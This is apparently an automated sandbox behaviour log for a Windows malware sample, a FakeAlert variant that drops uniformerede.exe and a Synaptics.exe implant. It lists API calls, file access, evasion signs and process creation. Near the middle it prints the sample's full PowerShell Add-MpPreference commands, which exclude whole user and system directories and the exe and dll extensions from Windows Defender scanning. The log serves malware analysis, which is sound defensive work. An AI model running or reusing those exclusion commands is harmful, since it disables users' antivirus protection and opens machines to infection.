Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6412 Thread sleep count: 695 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6520 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6468 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7164 Thread sleep time: -840000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6832 Thread sleep count: 1488 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6896 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5521
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 695
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1488
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe API coverage: 7.5 %
Source: C:\ProgramData\Synaptics\Synaptics.exe API coverage: 5.8 %
Source: C:\ProgramData\Synaptics\Synaptics.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: C:\ProgramData\Synaptics\Synaptics.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXF979.tmp
Source: C:\ProgramData\Synaptics\Synaptics.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 6_2_00458EA4
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 12_2_00458EA4
Source: C:\ProgramData\Synaptics\Synaptics.exe Thread delayed: delay time: 60000
Source: C:\Users\user\Desktop\._cache_uniformerede.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00426548 GetSystemInfo, 6_2_00426548
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 6_2_004099E0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 6_2_00406018
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00409B1C FindFirstFileA,GetLastError, 6_2_00409B1C
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_00405D74
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_0040290B FindFirstFileW, 7_2_0040290B
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_0040699E FindFirstFileW,FindClose, 7_2_0040699E
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 9_2_004099E0
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00409B1C FindFirstFileA,GetLastError, 9_2_00409B1C
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 9_2_00406018
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 12_2_00406018
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 12_2_004099E0
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00409B1C FindFirstFileA,GetLastError, 12_2_00409B1C
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList, 6_2_004730FC
Source: C:\ProgramData\Synaptics\Synaptics.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00422BCC VirtualAlloc,LdrInitializeThunk,LdrInitializeThunk, 9_2_00422BCC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Code function: 0_2_004014A5 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit, 0_2_004014A5

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Process created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00473490 ShellExecuteEx,Sleep,WaitForSingleObject, 6_2_00473490
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 6_2_004061D0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: GetLocaleInfoA,GetACP, 6_2_0040E088
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 6_2_004062DC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: GetLocaleInfoA, 6_2_0040C964
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: GetLocaleInfoA, 6_2_0040C9B0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: GetLocaleInfoA, 6_2_00406AC6
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: GetLocaleInfoA, 6_2_00406AC8
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 9_2_004061D0
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetLocaleInfoA,GetACP, 9_2_0040E088
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 9_2_004062DC
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetLocaleInfoA, 9_2_0040C964
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetLocaleInfoA, 9_2_0040C9B0
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetLocaleInfoA, 9_2_00406AC6
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetLocaleInfoA, 9_2_00406AC8
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 12_2_004061D0
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetLocaleInfoA,GetACP, 12_2_0040E088
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 12_2_004062DC
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetLocaleInfoA, 12_2_0040C964
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetLocaleInfoA, 12_2_0040C9B0
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetLocaleInfoA, 12_2_00406AC6
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: GetLocaleInfoA, 12_2_00406AC8
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0040B2D4 GetLocalTime, 6_2_0040B2D4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0047E020 GetTimeZoneInformation, 6_2_0047E020
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00472E58 GetUserNameA, 6_2_00472E58
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00446564 GetVersion, 6_2_00446564
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: cmd.exe /C 6_2_00475384
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: cmd.exe /C 9_2_00475384
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: cmd.exe /C 12_2_00475384
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0047C7BC bind, 9_2_0047C7BC
